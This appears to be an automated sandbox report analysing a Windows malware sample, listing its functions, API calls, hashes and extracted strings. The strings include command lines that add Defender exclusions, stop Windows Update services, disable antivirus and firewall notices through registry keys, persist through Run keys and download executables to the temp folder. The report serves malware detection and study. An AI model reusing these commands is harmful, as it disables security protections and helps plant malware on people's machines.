                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
                                                                                                                                                                                                      • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D7F4
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 0040D814
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D81A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 107502007-0
                                                                                                                                                                                                      • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                                      • Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99
                                                                                                                                                                                                      Function 0040B430 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                                                                                        • Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
                                                                                                                                                                                                        • Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                                                                                      • connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                                                                                      • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • www.update.microsoft.com, xrefs: 0040B467
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                                      • String ID: www.update.microsoft.com
                                                                                                                                                                                                      • API String ID: 4063137541-1705189816
                                                                                                                                                                                                      • Opcode ID: f159efbcf8a01faa4036468162d002d529369f8e2320b7a0d5a4ce48e9bb38ac
                                                                                                                                                                                                      • Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f159efbcf8a01faa4036468162d002d529369f8e2320b7a0d5a4ce48e9bb38ac
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA
                                                                                                                                                                                                      Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                                                                                      • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                                                                                        • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
                                                                                                                                                                                                        • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
                                                                                                                                                                                                        • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3943618503-0
                                                                                                                                                                                                      • Opcode ID: 2e22e1ace3e933a50ac164773468cd7a69cd4384e70ac368dc0859233ce66587
                                                                                                                                                                                                      • Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e22e1ace3e933a50ac164773468cd7a69cd4384e70ac368dc0859233ce66587
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A
                                                                                                                                                                                                      Function 0040C830 Relevance: 4.5, APIs: 3, Instructions: 26encryptionCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CryptAcquireContextW.ADVAPI32(004083EF,00000000,00000000,00000001,F0000040,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C843
                                                                                                                                                                                                      • CryptGenRandom.ADVAPI32(004083EF,?,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C859
                                                                                                                                                                                                      • CryptReleaseContext.ADVAPI32(004083EF,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C865
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1815803762-0
                                                                                                                                                                                                      • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                                      • Instruction ID: f90ee11572ba5f49e3e1a660dc1e1657e7f5db47d76125bfba77a944767198f2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69E012B5650208FBDB14DFD1EC49FDA776CAB48B01F108554F709E7180DAB5EA4097A8
                                                                                                                                                                                                      Function 00407940 Relevance: 287.7, APIs: 103, Strings: 61, Instructions: 749sleepfilesynchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 0 407940-407974 Sleep CreateMutexA GetLastError 1 407976-407978 ExitProcess 0->1 2 40797e-407a1d GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 407d31-407d9d Sleep ShellExecuteW * 2 RegOpenKeyExW 2->3 4 407a23-407a2e call 40f1b0 2->4 5 407dcb-407df6 RegOpenKeyExW 3->5 6 407d9f-407dc5 RegSetValueExW RegCloseKey 3->6 13 407a30-407a32 ExitProcess 4->13 14 407a38-407a86 ExpandEnvironmentStringsW wsprintfW CopyFileW 4->14 8 407e24-407e4f RegOpenKeyExW 5->8 9 407df8-407e1e RegSetValueExW RegCloseKey 5->9 6->5 11 407e51-407e77 RegSetValueExW RegCloseKey 8->11 12 407e7d-407ea8 RegOpenKeyExW 8->12 9->8 11->12 17 407ed6-407f01 RegOpenKeyExW 12->17 18 407eaa-407ed0 RegSetValueExW RegCloseKey 12->18 15 407b36-407b78 Sleep wsprintfW CopyFileW 14->15 16 407a8c-407ac6 SetFileAttributesW RegOpenKeyExW 14->16 22 407c28-407c81 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 15->22 23 407b7e-407bb8 SetFileAttributesW RegOpenKeyExW 15->23 16->15 21 407ac8-407afb wcslen RegSetValueExW 16->21 19 407f03-407f29 RegSetValueExW RegCloseKey 17->19 20 407f2f-407f5a RegOpenKeyExW 17->20 18->17 19->20 25 407f88-407fb3 RegOpenKeyExW 20->25 26 407f5c-407f82 RegSetValueExW RegCloseKey 20->26 27 407b29-407b30 RegCloseKey 21->27 28 407afd-407b1f RegCloseKey call 40f400 21->28 22->3 24 407c87-407cc1 SetFileAttributesW RegOpenKeyExW 22->24 23->22 29 407bba-407bed wcslen RegSetValueExW 23->29 24->3 30 407cc3-407cf6 wcslen RegSetValueExW 24->30 32 407fb5-408019 RegSetValueExW * 3 RegCloseKey 25->32 33 40801f-40804a RegOpenKeyExW 25->33 26->25 27->15 28->27 43 407b21-407b23 ExitProcess 28->43 34 407c1b-407c22 RegCloseKey 29->34 35 407bef-407c11 RegCloseKey call 40f400 29->35 36 407d24-407d2b RegCloseKey 30->36 37 407cf8-407d1a RegCloseKey call 40f400 30->37 32->33 39 408050-4080d3 RegSetValueExW * 4 RegCloseKey 33->39 40 4080d9-408104 RegOpenKeyExW 33->40 34->22 35->34 50 407c13-407c15 ExitProcess 35->50 36->3 37->36 51 407d1c-407d1e ExitProcess 37->51 39->40 44 4081f0-40821b RegOpenKeyExW 40->44 45 40810a-4081ea RegSetValueExW * 7 RegCloseKey 40->45 48 408221-408301 RegSetValueExW * 7 RegCloseKey 44->48 49 408307-40831c Sleep call 40d180 44->49 45->44 48->49 54 408491-40849a 49->54 55 408322-40847b WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405c00 call 40e0c0 call 407390 CreateEventA call 40c8b0 call 40dbb0 call 40bc70 call 40dbe0 * 4 call 40dd50 49->55 79 408480-40848e call 40de90 55->79 79->54
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 0040794E
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,mmn7nnm8na), ref: 0040795D
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00407969
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00407978
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysppvrdnvs.exe,00000105), ref: 004079B2
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(C:\Windows\sysppvrdnvs.exe), ref: 004079BD
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004079DA
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 004079EA
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
                                                                                                                                                                                                      • wcscmp.NTDLL ref: 00407A13
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00407A32
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                                                                                      • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysppvrdnvs.exe$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
                                                                                                                                                                                                      • API String ID: 4172876685-1466728445
                                                                                                                                                                                                      • Opcode ID: 6c3aa08d7c4c4069ddcf3c5aed638cf34e8cb556e5cf3fb678ad37c5e5b78497
                                                                                                                                                                                                      • Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c3aa08d7c4c4069ddcf3c5aed638cf34e8cb556e5cf3fb678ad37c5e5b78497
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C
                                                                                                                                                                                                      Function 0040F560 Relevance: 77.2, APIs: 36, Strings: 8, Instructions: 231filesleepnetworkCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040F569
                                                                                                                                                                                                      • srand.MSVCRT ref: 0040F570
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
                                                                                                                                                                                                      • strlen.NTDLL ref: 0040F59A
                                                                                                                                                                                                      • mbstowcs.NTDLL ref: 0040F5B1
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F5B9
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F5CD
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040F5F4
                                                                                                                                                                                                      • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040F6F4
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0040F704
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F70F
                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 0040F730
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040F758
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0040F76E
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F77B
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F788
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F795
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F7A0
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F7B5
                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 0040F7C6
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F7CC
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F7E0
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040F807
                                                                                                                                                                                                      • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040F844
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0040F854
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F85F
                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 0040F880
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040F8A7
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0040F8B6
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                                                                                      • String ID: y@$%s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$.Wu
                                                                                                                                                                                                      • API String ID: 1632876846-3866277539
                                                                                                                                                                                                      • Opcode ID: f66bbaa90db6dfc7324bdba7ae9ae0bc4e4b122ccc0d7fa92996eb741fb39ab1
                                                                                                                                                                                                      • Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f66bbaa90db6dfc7324bdba7ae9ae0bc4e4b122ccc0d7fa92996eb741fb39ab1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69
                                                                                                                                                                                                      Function 0040B850 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 115 40b850-40b867 call 40b780 118 40b869 115->118 119 40b86e-40b88a call 40b3d0 strcmp 115->119 120 40baf5-40baf8 118->120 123 40b891-40b8ad call 40b3d0 strstr 119->123 124 40b88c 119->124 127 40b8f0-40b90c call 40b3d0 strstr 123->127 128 40b8af-40b8cb call 40b3d0 strstr 123->128 124->120 135 40b90e-40b92a call 40b3d0 strstr 127->135 136 40b94f-40b96b call 40b3d0 strstr 127->136 133 40b8eb 128->133 134 40b8cd-40b8e9 call 40b3d0 strstr 128->134 133->120 134->127 134->133 145 40b94a 135->145 146 40b92c-40b948 call 40b3d0 strstr 135->146 143 40b96d-40b989 call 40b3d0 strstr 136->143 144 40b9ae-40b9c4 EnterCriticalSection 136->144 155 40b9a9 143->155 156 40b98b-40b9a7 call 40b3d0 strstr 143->156 148 40b9cf-40b9d8 144->148 145->120 146->136 146->145 151 40ba09-40ba14 call 40bb00 148->151 152 40b9da-40b9ea 148->152 163 40baea-40baef LeaveCriticalSection 151->163 164 40ba1a-40ba28 151->164 157 40ba07 152->157 158 40b9ec-40ba05 call 40df20 152->158 155->120 156->144 156->155 157->148 158->151 163->120 167 40ba2a 164->167 168 40ba2e-40ba30 call 40a740 164->168 167->168 170 40ba35-40ba3f 168->170 170->163 171 40ba45-40ba62 call 40df20 170->171 174 40ba64-40ba74 171->174 175 40baba-40bad2 171->175 177 40ba80-40bab8 call 40ab60 174->177 178 40ba76-40ba7e Sleep 174->178 176 40bad8-40bae3 call 40bb00 175->176 176->163 183 40bae5 call 40b530 176->183 177->176 178->174 183->163
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                                                                                        • Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                                                                                      • strcmp.NTDLL ref: 0040B880
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                                                                                      • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                                                                                      • API String ID: 2906596889-2213908610
                                                                                                                                                                                                      • Opcode ID: be1adfb21df1672b179acddae554e562d68734a0439b0a0b8caddf7385871258
                                                                                                                                                                                                      • Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: be1adfb21df1672b179acddae554e562d68734a0439b0a0b8caddf7385871258
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE
                                                                                                                                                                                                      Function 004059B0 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 185 4059b0-4059d2 GetWindowLongW 186 4059d4-4059db 185->186 187 4059f6-4059fd 185->187 188 4059e1-4059e5 186->188 189 405a67-405a78 IsClipboardFormatAvailable 186->189 190 405a26-405a2c 187->190 191 4059ff 187->191 192 405a04-405a21 SetClipboardViewer SetWindowLongW 188->192 193 4059e7-4059eb 188->193 197 405a83-405a8d IsClipboardFormatAvailable 189->197 198 405a7a-405a81 189->198 195 405a46-405a4a 190->195 196 405a2e-405a44 SetWindowLongW 190->196 194 405be4-405bfd DefWindowProcA 191->194 192->194 202 4059f1 193->202 203 405b9d-405bde RegisterRawInputDevices ChangeClipboardChain 193->203 204 405a62 195->204 205 405a4c-405a5c SendMessageA 195->205 196->204 200 405a98-405aa2 IsClipboardFormatAvailable 197->200 201 405a8f-405a96 197->201 199 405aab-405aaf 198->199 207 405ab5-405abf OpenClipboard 199->207 208 405b7f-405b83 199->208 200->199 206 405aa4 200->206 201->199 202->194 203->194 204->194 205->204 206->199 207->208 209 405ac5-405ad6 GetClipboardData 207->209 210 405b85-405b95 SendMessageA 208->210 211 405b9b 208->211 212 405ad8 209->212 213 405add-405aee GlobalLock 209->213 210->211 211->194 212->194 214 405af0 213->214 215 405af5-405b06 213->215 214->194 216 405b08-405b0c 215->216 217 405b29-405b3c call 40d250 215->217 219 405b3e-405b4e call 4057f0 216->219 220 405b0e-405b12 216->220 225 405b51-405b65 GlobalUnlock CloseClipboard 217->225 219->225 223 405b14 220->223 224 405b16-405b27 call 405680 220->224 223->225 224->225 225->208 229 405b67-405b7c call 404970 call 40ab60 225->229 229->208
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004059BC
                                                                                                                                                                                                      • SetClipboardViewer.USER32(?), ref: 00405A08
                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405AB7
                                                                                                                                                                                                      • GetClipboardData.USER32(00000000), ref: 00405AC9
                                                                                                                                                                                                      • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
                                                                                                                                                                                                      • ChangeClipboardChain.USER32(?,?), ref: 00405BDE
                                                                                                                                                                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
